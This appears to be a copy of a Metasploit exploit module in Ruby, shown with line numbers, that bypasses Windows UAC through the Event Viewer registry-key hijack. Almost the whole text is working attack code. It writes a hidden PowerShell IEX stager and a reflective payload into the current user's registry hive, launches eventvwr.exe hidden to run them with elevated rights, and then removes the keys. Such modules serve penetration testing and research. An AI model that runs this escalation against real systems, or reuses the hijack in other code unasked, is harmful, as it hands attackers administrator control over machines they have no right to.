Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Exploit::Powershell
10
  include Post::Windows::Priv
11
  include Post::Windows::Registry
12
  include Post::Windows::Runas
13

14
  EVENTVWR_DEL_KEY = 'HKCU\\Software\\Classes\\mscfile'.freeze
15
  EVENTVWR_WRITE_KEY = 'HKCU\\Software\\Classes\\mscfile\\shell\\open\\command'.freeze
16
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
17
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
18
  EVENTVWR_PATH = '%WINDIR%\\System32\\eventvwr.exe'.freeze
19
  EVENTVWR_WOW64_PATH = '%WINDIR%\\SysWOW64\\eventvwr.exe'.freeze
20
  PSH_PATH = '%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe'.freeze
21
  CMD_MAX_LEN = 2081
22

23
  def initialize(info = {})
24
    super(
25
      update_info(
26
        info,
27
        'Name' => 'Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)',
28
        'Description' => %q{
29
          This module will bypass Windows UAC by hijacking a special key in the Registry under
30
          the current user hive, and inserting a custom command that will get invoked when
31
          the Windows Event Viewer is launched. It will spawn a second shell that has the UAC
32
          flag turned off.
33

34
          This module modifies a registry key, but cleans up the key once the payload has
35
          been invoked.
36

37
          The module does not require the architecture of the payload to match the OS. If
38
          specifying EXE::Custom your DLL should call ExitProcess() after starting your
39
          payload in a separate process.
40
        },
41
        'License' => MSF_LICENSE,
42
        'Author' => [
43
          'Matt Nelson', # UAC bypass discovery and research
44
          'Matt Graeber',   # UAC bypass discovery and research
45
          'OJ Reeves'       # MSF module
46
        ],
47
        'Platform' => ['win'],
48
        'SessionTypes' => ['meterpreter'],
49
        'Targets' => [
50
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
51
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
52
        ],
53
        'DefaultTarget' => 0,
54
        'References' => [
55
          ['URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/'],
56
          ['URL', 'https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1']
57
        ],
58
        'DisclosureDate' => '2016-08-15',
59
        'Compat' => {
60
          'Meterpreter' => {
61
            'Commands' => %w[
62
              stdapi_railgun_api
63
            ]
64
          }
65
        }
66
      )
67
    )
68
  end
69

70
  def check
71
    version = get_version_info
72
    if version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win10_1607)
73
      Exploit::CheckCode::Appears
74
    else
75
      Exploit::CheckCode::Safe
76
    end
77
  end
78

79
  def exploit
80
    eventvwr_cmd = EVENTVWR_PATH
81
    registry_view = REGISTRY_VIEW_NATIVE
82

83
    # Make sure we have a sane payload configuration
84

85
    if session.arch != target.arch.first
86
      fail_with(Failure::NoTarget, 'Session and Target arch must match')
87
    end
88
    if sysinfo['Architecture'] == ARCH_X64
89
      vprint_status('Target is x64')
90
      if session.arch == ARCH_X86
91
        vprint_status('Detected Target/Session mismatch.  Syswow Required.')
92
        registry_view = REGISTRY_VIEW_64_BIT
93
        eventvwr_cmd = EVENTVWR_WOW64_PATH
94
      end
95
    elsif target_arch.first == ARCH_X64
96
      # if we're on x86, we can't handle x64 payloads
97
      fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
98
    end
99

100
    # Validate that we can actually do things before we bother
101
    # doing any more work
102
    check_permissions!
103

104
    case get_uac_level
105
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
106
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
107
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
108
      fail_with(Failure::NotVulnerable,
109
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
110
    when UAC_DEFAULT
111
      print_good('UAC is set to Default')
112
      print_good('BypassUAC can bypass this setting, continuing...')
113
    when UAC_NO_PROMPT
114
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
115
      shell_execute_exe
116
      return
117
    end
118

119
    payload_value = rand_text_alpha(8)
120
    psh_path = expand_path(PSH_PATH.to_s)
121
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
122
    vprint_status("template_path #{template_path}")
123
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload.encoded)
124

125
    psh_stager = "\"IEX (Get-ItemProperty -Path #{EVENTVWR_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
126
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
127

128
    existing = registry_getvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, registry_view) || ''
129

130
    if existing.empty?
131
      registry_createkey(EVENTVWR_WRITE_KEY, registry_view)
132
    end
133

134
    print_status('Configuring payload and stager registry keys ...')
135
    registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
136
    registry_setvaldata(EVENTVWR_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
137

138
    cmd_path = expand_path(eventvwr_cmd.to_s)
139
    print_status("Executing payload: #{cmd_path}")
140
    result = client.railgun.shell32.ShellExecuteA(nil, 'open', cmd_path, nil, nil, 'SW_HIDE')
141

142
    if result['return'] > 32
143
      print_good('eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.')
144
      Rex.sleep(10)
145
    else
146
      print_error("eventvwr.exe execution failed with Error Code: #{result['GetLastError']} - #{result['ErrorMessage']}")
147
    end
148

149
    handler(client)
150

151
    print_status('Cleaning up registry keys ...')
152
    if existing.empty?
153
      registry_deletekey(EVENTVWR_DEL_KEY, registry_view)
154
    else
155
      registry_setvaldata(EVENTVWR_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
156
      registry_deleteval(EVENTVWR_WRITE_KEY, payload_value, registry_view)
157
    end
158
  end
159

160
  def check_permissions!
161
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
162

163
    # Check if you are an admin
164
    vprint_status('Checking admin status...')
165
    admin_group = is_in_admin_group?
166

167
    unless check == Exploit::CheckCode::Appears
168
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
169
    end
170

171
    unless is_in_admin_group?
172
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
173
    end
174

175
    print_status('UAC is Enabled, checking level...')
176
    if admin_group.nil?
177
      print_error('Either whoami is not there or failed to execute')
178
      print_error('Continuing under assumption you already checked...')
179
    elsif admin_group
180
      print_good('Part of Administrators group! Continuing...')
181
    else
182
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
183
    end
184

185
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
186
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
187
    end
188
  end
189
end
190

191